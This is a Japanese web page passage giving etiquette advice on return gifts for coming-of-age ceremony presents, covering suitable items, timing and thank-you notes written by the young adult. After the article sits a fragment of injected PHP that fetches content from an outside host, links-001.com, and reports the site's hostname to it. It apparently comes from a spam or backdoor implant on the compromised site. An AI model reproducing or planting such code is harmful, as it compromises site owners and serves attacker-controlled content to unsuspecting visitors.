前へ
次へ

マナーある対応が大切です。

成人式は子供の成人のお祝いで、身内で祝うのが一般的です。親族などから現金や品物をお祝いとしてもらう人も多いと思いますが、お返しや内祝いをする必要はないとされます。もし、内祝いをする場合には金額の半分程度を目安に品物を選ぶといいでしょう。選ぶものは食品や生活雑貨などの身近なものが適しており、最近ではカタログギフトなどを選ぶ人も多くなっています。贈る時期は成人式の前後1ヶ月以内が適当で、お礼の言葉を添えるのを忘れないようにしましょう。直接手渡す場合は本人がお礼の言葉を伝えるのが適していますし、郵送する場合でも本人がお礼状を記すようにしましょう。大人としての第一歩としてマナーある対応をすることが大切です。こどもが20歳になって成人式を迎える頃になると、親族や知人など、周囲の人たちからお祝いをもらう事が多くあります。特に、社会の一員となる大きな節目であるため、20歳になる息子や娘をもつ家庭においては、お祝いされる機会が多くなります。成人式のお祝いを頂くと、その家庭では、お祝いを頂いたお返しの印として、品物ののしに『内祝い』と記してお礼を表します。成人式を迎えた本人というよりも、その家庭にとって頂いたお祝いのお返しとして、内祝いの品物を母親などが選択して贈る事になります。お礼状を付ける場合などにおいては、印刷でない時には、成人式を迎える本人がその文面を記しても、相手にお礼の気持ちが伝わり易くなります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top